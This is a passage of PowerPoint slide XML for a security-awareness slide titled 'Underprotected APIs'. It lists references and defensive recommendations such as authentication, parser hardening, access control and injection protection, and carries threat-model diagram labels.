                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ultimately, knowing if your APIs are secure means carefully choosing a strategy to test all defenses that matter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6400800"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>REST Security Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Web Service Security Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Increasing Importance of APIs in Web Development</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Tracking the Growth of the API Economy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>The API Centric Future</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>The Growth of the API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>What Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>y Security Tools Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ork on APIs?!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>State of API Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3581400"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The key to protecting APIs is to ensure that you fully understand the threat model and what defenses you have:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure that you have secured communications between the client and your APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure that you have a strong authentication scheme for your APIs, and that all credentials, keys, and tokens have been secured.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure that whatever data format your requests use, that the parser configuration is hardened against attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implement an access control scheme that protects APIs from being improperly invoked, including unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function and data references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protect against injection of all forms, as these attacks are just as viable through APIs as they are for normal apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Be sure your security analysis and testing covers all your APIs and your tools can discover and analyze them all effectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Underprotected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
